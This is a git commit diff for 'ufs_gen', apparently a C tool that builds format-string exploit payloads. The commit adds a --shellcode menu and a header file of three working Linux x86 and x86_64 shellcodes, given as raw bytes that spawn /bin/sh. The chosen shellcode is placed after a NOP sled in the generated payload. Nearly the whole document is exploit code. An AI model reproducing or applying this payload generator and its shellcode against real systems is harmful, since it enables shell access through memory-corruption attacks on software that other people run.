diff options
-rw-r--r-- | NEWS | 3 | ||||
-rw-r--r-- | main.c | 67 | ||||
-rw-r--r-- | shellcodes.h | 84 |
3 files changed, 145 insertions, 9 deletions
@@ -0,0 +1,3 @@ +01/27/14 +The support of the option --shellcode has been implemented. +When the user specifies this option, a list of common shellcodes is displayed and the user is able to select one of them. @@ -24,6 +24,7 @@ #include <stdio.h> #include <getopt.h> +#include "shellcodes.h" static unsigned char payload[4096]; @@ -48,6 +49,11 @@ static char *suffix_g = NULL; /* how many NOP bytes (0x90) shall we append before suffix */ static int suffix_nops_g = 0; +/* shall we display a menu with the possible shellcodes ? */ +static bool select_shellcode_g = false; + +static char *shellcode_g = NULL; + __attribute__((noreturn)) static void usage(const char *arg0) { @@ -57,7 +63,9 @@ static void usage(const char *arg0) fputs( "ufs_gen " "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n" - " --override addr --with addr --stackidx idx\n", stderr); + " --override addr --with addr --stackidx idx\n" + " --shellcode\n" + , stderr); exit(EX_USAGE); } @@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[]) OPT_PREFIX, OPT_SUFFIX, OPT_SFX_NOPS, + OPT_SHELLCODE, }; static struct option long_options[] = { - {"override", required_argument, 0, OPT_OVERRIDE}, - {"with", required_argument, 0, OPT_WITH}, - {"stackidx", required_argument, 0, OPT_STACKIDX}, - {"addrsize", required_argument, 0, OPT_ADDR_SIZE}, - {"prefix", required_argument, 0, OPT_PREFIX}, - {"suffix", required_argument, 0, OPT_SUFFIX}, - {"sfxnops", required_argument, 0, OPT_SFX_NOPS}, + {"override", required_argument, 0, OPT_OVERRIDE}, + {"with", required_argument, 0, OPT_WITH}, + {"stackidx", required_argument, 0, OPT_STACKIDX}, + {"addrsize", required_argument, 0, OPT_ADDR_SIZE}, + {"prefix", required_argument, 0, OPT_PREFIX}, + {"suffix", required_argument, 0, OPT_SUFFIX}, + {"sfxnops", required_argument, 0, OPT_SFX_NOPS}, + {"shellcode", no_argument, 0, OPT_SHELLCODE}, }; int option_index; @@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[]) case OPT_SFX_NOPS: suffix_nops_g = atoi(optarg); break; + case OPT_SHELLCODE: + select_shellcode_g = true; + break; default: /* * we must have accessed an option which we do not have @@ -198,6 +211,30 @@ int main(int argc, char *argv[]) usage(argv[0]); } + if (select_shellcode_g) { + for (;;) { + char buffer[256]; + int sel; + + /* display the name of the common shellcodes */ + for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) { + fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name); + } + fputs("select a shellcode. CTRL-D for no shellcode: ", stderr); + + if (fgets(buffer, sizeof(buffer), stdin) == NULL) + break; + + /* check if the selection is valid */ + sel = atoi(buffer); + if (sel <= 0 || sel > SHELLCODE_COUNT) + continue; + + shellcode_g = common_shellcodes_g[sel - 1].payload; + break; + } + } + if (prefix_g != NULL) { int len_pfx = strlen(prefix_g); int mod_len_pfx = len_pfx % address_size_g; @@ -242,11 +279,23 @@ int main(int argc, char *argv[]) ++idx_stack_g; } - fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i); + /* append the NOP bytes */ + if (suffix_nops_g > 0) { + fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i); + } for (int nop = 0; nop < suffix_nops_g; ++nop) { payload[i++] = '\x90'; } + /* append the shellcode */ + if (shellcode_g != NULL) { + fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i); + int len_shellcode = strlen(shellcode_g); + + memcpy(payload + i, shellcode_g, len_shellcode); + i += len_shellcode; + } + if (suffix_g != NULL) { fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i); int len_suffix = strlen(suffix_g); diff --git a/shellcodes.h b/shellcodes.h new file mode 100644 index 0000000..679a0d9 --- /dev/null +++ b/shellcodes.h @@ -0,0 +1,84 @@ +/* + * Copyright (C) 2014 Olivier Gayot + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + + * You should have received a copy of the GNU General Public License along + * with this program; if not, write to the Free Software Foundation, Inc., + * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + */ + +#ifndef SHELLCODES_H +#define SHELLCODES_H + +typedef struct { + char *name; + char *payload; +} shellcode_t; + +shellcode_t common_shellcodes_g[] = { + { + .name = "Linux x86\n" + "\texecve(\"/bin/sh\", 0, 0)", + .payload = "\x68\x2f\x73\x68\xff" + "\xfe\x44\x24\x03" + "\x68\x2f\x62\x69\x6e" + "\x31\xc0" + "\xb0\x0b" + "\x89\xe3" + "\x31\xc9" + "\x31\xd2" + "\xcd\x80" + }, { + .name = "Linux x86\n" + "\tclose(0); open(\"/dev/tty\", 0); execve(\"/bin/sh\", 0, 0)", + .payload = "\x83\xec\x09" + "\x31\xc0" + "\xb0\x06" + "\x31\xdb" + "\xcd\x80" + "\xc7\x04\x24\x2f\x64\x65\x76" + "\xc7\x44\x24\x04\x2f\x74\x74\x79" + "\xc0\x6c\x24\x08\x08" + "\x31\xc0" + "\xb0\x05" + "\x89\xe3" + "\x31\xc9" + "\xcd\x80" + "\xc7\x04\x24\x2f\x62\x69\x6e" + "\xc7\x44\x24\x04\xff\x2f\x73\x68" + "\xb0\x0b" + "\x89\xe3" + "\xc1\x6b\x04\x08" + "\x31\xc9" + "\x31\xd2" + "\xcd\x80" + }, { + .name = "Linux x86_64\n" + "\texecve(\"/bin/sh\", 0, 0)", + .payload = "\x68\x2f\x62\x69\x6e" + "\xc7\x44\x24\x04\x2f\x73\x68" + "\xff" + "\xfe\x44\x24\x07" + "\x48\x31\xc0" + "\xb0\x3b" + "\x48\x89\xe7" + "\x48\x31\xf6" + "\x48\x31\xd2" + "\x0f\x05" + }, +}; + +#define SHELLCODE_COUNT \ + ((int)(sizeof(common_shellcodes_g) / sizeof(common_shellcodes_g[0]))) + + +#endif /* SHELLCODES_H */ |